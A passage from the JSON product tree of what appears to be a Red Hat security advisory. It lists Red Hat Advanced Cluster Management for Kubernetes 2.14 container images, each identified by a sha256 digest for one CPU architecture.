"name": "registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:9aa65853e2ab9469cbce3dc8dd5b40c6a19f844c2f07eb2657639b56afdc6b3b_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:9aa65853e2ab9469cbce3dc8dd5b40c6a19f844c2f07eb2657639b56afdc6b3b_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:9aa65853e2ab9469cbce3dc8dd5b40c6a19f844c2f07eb2657639b56afdc6b3b_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:857f48a392757a6fec8a26bddc7bccffa463c33c5824bf8a809784e5b06f9cb1_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:857f48a392757a6fec8a26bddc7bccffa463c33c5824bf8a809784e5b06f9cb1_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:857f48a392757a6fec8a26bddc7bccffa463c33c5824bf8a809784e5b06f9cb1_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:be40e3b9e6f7e8ea857b906e82e8ffc713fbd9b3f4016711a8158f5054d951fb_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:be40e3b9e6f7e8ea857b906e82e8ffc713fbd9b3f4016711a8158f5054d951fb_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:be40e3b9e6f7e8ea857b906e82e8ffc713fbd9b3f4016711a8158f5054d951fb_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:e951334f9a85760ad85e96695e35ff045ea274ca0203a96ef7394d4905379325_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:e951334f9a85760ad85e96695e35ff045ea274ca0203a96ef7394d4905379325_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:e951334f9a85760ad85e96695e35ff045ea274ca0203a96ef7394d4905379325_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:ea69db2fd8c7ce3e39af7997a83812dd97b7fec6fce3d6776ec652b81fd3b7cf_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:ea69db2fd8c7ce3e39af7997a83812dd97b7fec6fce3d6776ec652b81fd3b7cf_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:ea69db2fd8c7ce3e39af7997a83812dd97b7fec6fce3d6776ec652b81fd3b7cf_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/console-rhel9@sha256:86c711091d0a954427d4dcd667cee8feda6dbc6fa2616de9f3316750b04c27e7_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:86c711091d0a954427d4dcd667cee8feda6dbc6fa2616de9f3316750b04c27e7_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/console-rhel9@sha256:86c711091d0a954427d4dcd667cee8feda6dbc6fa2616de9f3316750b04c27e7_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/console-rhel9@sha256:8d21a1ec53eff605f99f5a79162e7fcf5092a3c30bcbd21b23f0c7bd9bc5bdcf_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:8d21a1ec53eff605f99f5a79162e7fcf5092a3c30bcbd21b23f0c7bd9bc5bdcf_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/console-rhel9@sha256:8d21a1ec53eff605f99f5a79162e7fcf5092a3c30bcbd21b23f0c7bd9bc5bdcf_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/console-rhel9@sha256:b74c9fb6ad13b57c47634acbd269fb53e937aba7dbbad45e50b9a6dc60dfa87c_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:b74c9fb6ad13b57c47634acbd269fb53e937aba7dbbad45e50b9a6dc60dfa87c_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/console-rhel9@sha256:b74c9fb6ad13b57c47634acbd269fb53e937aba7dbbad45e50b9a6dc60dfa87c_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/console-rhel9@sha256:f15faa8241eb4808d2f4c7c07f1ff9e0036202665c35e3df983055fe7bc0885e_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:f15faa8241eb4808d2f4c7c07f1ff9e0036202665c35e3df983055fe7bc0885e_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/console-rhel9@sha256:f15faa8241eb4808d2f4c7c07f1ff9e0036202665c35e3df983055fe7bc0885e_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:3fd793aaa8b22670c9a863613bd20e1fbbd946b8a15bc684bb952364d98a0c28_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:3fd793aaa8b22670c9a863613bd20e1fbbd946b8a15bc684bb952364d98a0c28_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:3fd793aaa8b22670c9a863613bd20e1fbbd946b8a15bc684bb952364d98a0c28_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:5c3b02c97bc9d3383b69157f98c8e9091905973af181692a11caf414ca366331_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:5c3b02c97bc9d3383b69157f98c8e9091905973af181692a11caf414ca366331_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:5c3b02c97bc9d3383b69157f98c8e9091905973af181692a11caf414ca366331_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:719f5cfdb6fbac0903e350e7df9e983dbd4109a83055b335db3b7895353f64c0_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:719f5cfdb6fbac0903e350e7df9e983dbd4109a83055b335db3b7895353f64c0_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:719f5cfdb6fbac0903e350e7df9e983dbd4109a83055b335db3b7895353f64c0_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:eda1cbe6851aa6fb1921e11a8c608d22210a8f63c9fe145e8f5ae0eb585b6cce_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:eda1cbe6851aa6fb1921e11a8c608d22210a8f63c9fe145e8f5ae0eb585b6cce_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:eda1cbe6851aa6fb1921e11a8c608d22210a8f63c9fe145e8f5ae0eb585b6cce_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:2da0d50b3c91414f3e58dfacf6f47f8770790d16b70d55afb1d291533575ab85_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:2da0d50b3c91414f3e58dfacf6f47f8770790d16b70d55afb1d291533575ab85_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:2da0d50b3c91414f3e58dfacf6f47f8770790d16b70d55afb1d291533575ab85_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:b8854dbea48fdc080a446859dbf92cbe5cf3dbd25959a5c0608ebe3a8222b031_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:b8854dbea48fdc080a446859dbf92cbe5cf3dbd25959a5c0608ebe3a8222b031_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:b8854dbea48fdc080a446859dbf92cbe5cf3dbd25959a5c0608ebe3a8222b031_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:cfd3cf79f22ec65643a9637779ac200ca33784f9f558ea233de05597396fe65c_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:cfd3cf79f22ec65643a9637779ac200ca33784f9f558ea233de05597396fe65c_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:cfd3cf79f22ec65643a9637779ac200ca33784f9f558ea233de05597396fe65c_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:dfc54b25aeb5826df80d9f98031bd2675065e25cb3ae8692871478cae5194973_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:dfc54b25aeb5826df80d9f98031bd2675065e25cb3ae8692871478cae5194973_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:dfc54b25aeb5826df80d9f98031bd2675065e25cb3ae8692871478cae5194973_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:45a3b742df7e286cbf840e32285b281803f9e97f579af9721f9f9ae00bd2c824_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:45a3b742df7e286cbf840e32285b281803f9e97f579af9721f9f9ae00bd2c824_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:45a3b742df7e286cbf840e32285b281803f9e97f579af9721f9f9ae00bd2c824_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:580a0307f5881f91950436573a17854ecd339045f60a88f5bd18adeecb5b0ca9_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:580a0307f5881f91950436573a17854ecd339045f60a88f5bd18adeecb5b0ca9_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:580a0307f5881f91950436573a17854ecd339045f60a88f5bd18adeecb5b0ca9_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:607796d67b50b70e54520428d0b2a1e53b604dae9395ce7a011e57787562de89_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:607796d67b50b70e54520428d0b2a1e53b604dae9395ce7a011e57787562de89_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:607796d67b50b70e54520428d0b2a1e53b604dae9395ce7a011e57787562de89_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:b5445243950f037d7932cdfef65443df4558717a782712ea3dfa792bbc18891a_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:b5445243950f037d7932cdfef65443df4558717a782712ea3dfa792bbc18891a_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:b5445243950f037d7932cdfef65443df4558717a782712ea3dfa792bbc18891a_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/insights-client-rhel9@sha256:08f1c3f4bbd371a46fdbd696026a9509053e4c091d591f8c92e32ed5590b432e_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:08f1c3f4bbd371a46fdbd696026a9509053e4c091d591f8c92e32ed5590b432e_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/insights-client-rhel9@sha256:08f1c3f4bbd371a46fdbd696026a9509053e4c091d591f8c92e32ed5590b432e_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/insights-client-rhel9@sha256:47f7aa6cfb685cf9d533ef3b505ede5c614e2837513bfe3f68b76c3f650ca240_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:47f7aa6cfb685cf9d533ef3b505ede5c614e2837513bfe3f68b76c3f650ca240_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/insights-client-rhel9@sha256:47f7aa6cfb685cf9d533ef3b505ede5c614e2837513bfe3f68b76c3f650ca240_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/insights-client-rhel9@sha256:d739b5a788d6888fb970f44d03869467731d8d03a34f271cebeb31e0e34edddd_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:d739b5a788d6888fb970f44d03869467731d8d03a34f271cebeb31e0e34edddd_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/insights-client-rhel9@sha256:d739b5a788d6888fb970f44d03869467731d8d03a34f271cebeb31e0e34edddd_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/insights-client-rhel9@sha256:d978057f781d3ef887909cab4211f892017e76de317f3d2f17cd6314ec883939_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:d978057f781d3ef887909cab4211f892017e76de317f3d2f17cd6314ec883939_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/insights-client-rhel9@sha256:d978057f781d3ef887909cab4211f892017e76de317f3d2f17cd6314ec883939_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:212e04293273e80955e59c3346933abc016ffa23c6072718b98b918ac07d6a1c_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:212e04293273e80955e59c3346933abc016ffa23c6072718b98b918ac07d6a1c_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:212e04293273e80955e59c3346933abc016ffa23c6072718b98b918ac07d6a1c_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:505f4d5caff4451c781320044f2b01968fafa1a7b2c4734627f9778526c06494_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:505f4d5caff4451c781320044f2b01968fafa1a7b2c4734627f9778526c06494_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:505f4d5caff4451c781320044f2b01968fafa1a7b2c4734627f9778526c06494_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:b7aa114127474db733d9f4080d2770a48e13dc8971b483aec36d0227a7e2c22c_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:b7aa114127474db733d9f4080d2770a48e13dc8971b483aec36d0227a7e2c22c_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:b7aa114127474db733d9f4080d2770a48e13dc8971b483aec36d0227a7e2c22c_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:e3d2d1e3d4467a8ee296180442f093643d07e2fe1f9c99b683ea69942d53c997_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:e3d2d1e3d4467a8ee296180442f093643d07e2fe1f9c99b683ea69942d53c997_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:e3d2d1e3d4467a8ee296180442f093643d07e2fe1f9c99b683ea69942d53c997_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:1b56fc6c4b897bb8a62b1fa176af6bace8282b2de38e3e69b5673c5ae3e6848c_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:1b56fc6c4b897bb8a62b1fa176af6bace8282b2de38e3e69b5673c5ae3e6848c_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:1b56fc6c4b897bb8a62b1fa176af6bace8282b2de38e3e69b5673c5ae3e6848c_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:55dd4696828ab8a7546481b8124406d858b9a43563e14599d06f5e5b1ac030f5_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:55dd4696828ab8a7546481b8124406d858b9a43563e14599d06f5e5b1ac030f5_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:55dd4696828ab8a7546481b8124406d858b9a43563e14599d06f5e5b1ac030f5_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:c13595e478ea28b6ba8d146d5a93c6f271babf253653d914139000e5af34d022_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:c13595e478ea28b6ba8d146d5a93c6f271babf253653d914139000e5af34d022_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:c13595e478ea28b6ba8d146d5a93c6f271babf253653d914139000e5af34d022_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:e780559caf89469f58e9d6646c389031a4cb080853aad7d471a5e7339c39f28c_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:e780559caf89469f58e9d6646c389031a4cb080853aad7d471a5e7339c39f28c_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:e780559caf89469f58e9d6646c389031a4cb080853aad7d471a5e7339c39f28c_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:263dcdd063b32734cead282523078f3365e8ff793eabe18c95207316bf2dbf77_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:263dcdd063b32734cead282523078f3365e8ff793eabe18c95207316bf2dbf77_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:263dcdd063b32734cead282523078f3365e8ff793eabe18c95207316bf2dbf77_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:2d5dd95834e1cac3c33a22708c97fccd17e6a5891cfb9cf07d61caab399322df_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:2d5dd95834e1cac3c33a22708c97fccd17e6a5891cfb9cf07d61caab399322df_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:2d5dd95834e1cac3c33a22708c97fccd17e6a5891cfb9cf07d61caab399322df_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:9f7cc4bc6e4019ec9b9e9b72f469902e54befa09560c1d1a1928ab1de5716ce1_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:9f7cc4bc6e4019ec9b9e9b72f469902e54befa09560c1d1a1928ab1de5716ce1_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:9f7cc4bc6e4019ec9b9e9b72f469902e54befa09560c1d1a1928ab1de5716ce1_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:dcdecabafdeba7adbf11f25eb4271dc69a7726216f52948bb26527ac5c1bab6f_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:dcdecabafdeba7adbf11f25eb4271dc69a7726216f52948bb26527ac5c1bab6f_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:dcdecabafdeba7adbf11f25eb4271dc69a7726216f52948bb26527ac5c1bab6f_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:42122cf17900940fba0ba140e4983eb2ced2f0001792501b99523fd6b7960335_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:42122cf17900940fba0ba140e4983eb2ced2f0001792501b99523fd6b7960335_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:42122cf17900940fba0ba140e4983eb2ced2f0001792501b99523fd6b7960335_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:495c5326c40792227be26ef78244a0f72cbf3124c843a68cc07e724abac5b31e_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:495c5326c40792227be26ef78244a0f72cbf3124c843a68cc07e724abac5b31e_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:495c5326c40792227be26ef78244a0f72cbf3124c843a68cc07e724abac5b31e_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
